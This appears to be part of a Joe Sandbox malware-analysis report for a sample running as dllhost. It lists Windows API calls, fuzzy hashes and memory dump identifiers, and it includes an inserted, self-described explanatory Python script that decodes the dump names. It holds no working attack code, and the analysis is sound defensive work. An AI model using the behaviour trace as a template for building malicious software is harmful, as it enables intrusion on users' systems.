• Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
• Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
• Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405802
• GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
• Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
• Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
• Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
APIs
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: FileMove
• String ID:
• API String ID: 3562171763-0
• Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
• Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
• Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
• Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
APIs
• WritePrivateProfileStringW.KERNEL32 ref: 0040233D
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
• Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
• Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
• Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                              APIs
                                                                              • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406110
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
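The dump names under "Memory Dump Source" encode the process, the region address and the page protection the region had when it was dumped. The script below is an added example, not part of the Joe Sandbox report: it decodes the entries listed above into an RVA map of the PE image based at 0x400000 in process 0xB (the dllhost process named in the snapshot file) and checks which region the call sites listed under APIs fall into. Assumptions, not stated by the report: the fifth dotted field is a winnt.h PAGE_* protection value (0x20 = PAGE_EXECUTE_READ fits the code region at 0x401000, 0x02 and 0x04 fit the read-only and read-write data regions), the remaining fields are left uninterpreted, a region is taken to run up to the next region's start because sizes are not in the name, and the snapshot-name reconstruction generalizes the single pairing shown here (hcaresult_11_2_400000_dllhost.jbxd).

```python
"""Decode Joe Sandbox *.sdmp dump identifiers into a per-region image map.

Added example, not part of the sandbox report.  Only the PID, the region
address and the protection field are interpreted; the other fields are kept
as opaque integers (assumption: their meaning is not established here).
"""
import re
from dataclasses import dataclass

# winnt.h memory protection constants.  Assumption: the fifth dotted field of
# a dump name is the PAGE_* protection of the region when it was dumped.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80

_NAME = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<address>[0-9A-F]{16})\.(?P<protection>[0-9A-F]{8})\."
    r"(?P<f6>[0-9A-F]{8})\.(?P<f7>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    seq: int
    address: int
    protection: int
    extra: tuple  # fields 6-8, uninterpreted

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:08X}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXECUTABLE_MASK)


def parse_dump_name(name: str) -> DumpRegion:
    """Split one dump file name into its fields (hex fields decoded)."""
    m = _NAME.match(name)
    if not m:
        raise ValueError(f"not a sandbox dump name: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        stage=int(m["stage"], 16),
        seq=int(m["seq"]),
        address=int(m["address"], 16),
        protection=int(m["protection"], 16),
        extra=tuple(int(m[k], 16) for k in ("f6", "f7", "f8")),
    )


def snapshot_name(region: DumpRegion, image_base: int, module: str) -> str:
    """Rebuild the IDA-plugin snapshot name the report pairs with a dump:
    decimal PID, stage, image base in hex, host module (generalized from the
    one pairing on the page)."""
    return f"hcaresult_{region.pid}_{region.stage}_{image_base:x}_{module}.jbxd"


def image_layout(image_base: int, names):
    """Regions sorted by address, each as (RVA, protection name, executable)."""
    regions = sorted((parse_dump_name(n) for n in names), key=lambda r: r.address)
    return [(r.address - image_base, r.protection_name, r.executable) for r in regions]


def executable_rvas(image_base: int, names):
    """RVAs of regions that were executable when dumped: where the API call
    sites live and where disassembly should start."""
    return [rva for rva, _, is_exec in image_layout(image_base, names) if is_exec]


def region_containing(image_base: int, names, address: int):
    """Start RVA of the region covering `address`; each region is assumed to
    extend up to the next region's start, since sizes are not in the name."""
    rva = address - image_base
    found = None
    for start, _, _ in image_layout(image_base, names):
        if start <= rva:
            found = start
        else:
            break
    return found


# Constructed from the entries above: the source dump and a subset of its
# associated dumps for process 0xB, image based at 0x400000.
IMAGE_BASE = 0x400000
DUMPS = [
    "0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp",
    "0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp",
    "0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp",
    "0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp",
    "0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp",
]

if __name__ == "__main__":
    for rva, prot, is_exec in image_layout(IMAGE_BASE, DUMPS):
        print(f"RVA 0x{rva:06X}  {prot:<24}{'<-- code' if is_exec else ''}")
    # The RegCreateKeyExW call site (ref: 00406110) sits in the executable region.
    print(hex(region_containing(IMAGE_BASE, DUMPS, 0x406110)))
    print(snapshot_name(parse_dump_name(DUMPS[0]), IMAGE_BASE, "dllhost"))
```

Run against the full list of associated dumps the layout shows one executable region at RVA 0x1000 followed by read-only and read-write data, which is the shape of a normal PE image; every API reference address in this section (00406110, 00405DD5, 00405E04, 00402379, 004015AE, 0040423F, 00404224, 00403303) resolves to that region.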
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405DD5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405E04
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                              • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                              • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                                                              APIs
                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileString
                                                                              • String ID:
                                                                              • API String ID: 1096422788-0
                                                                              • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                              • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                                              APIs
                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                                              • Opcode Fuzzy Hash: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                                              • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                              • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
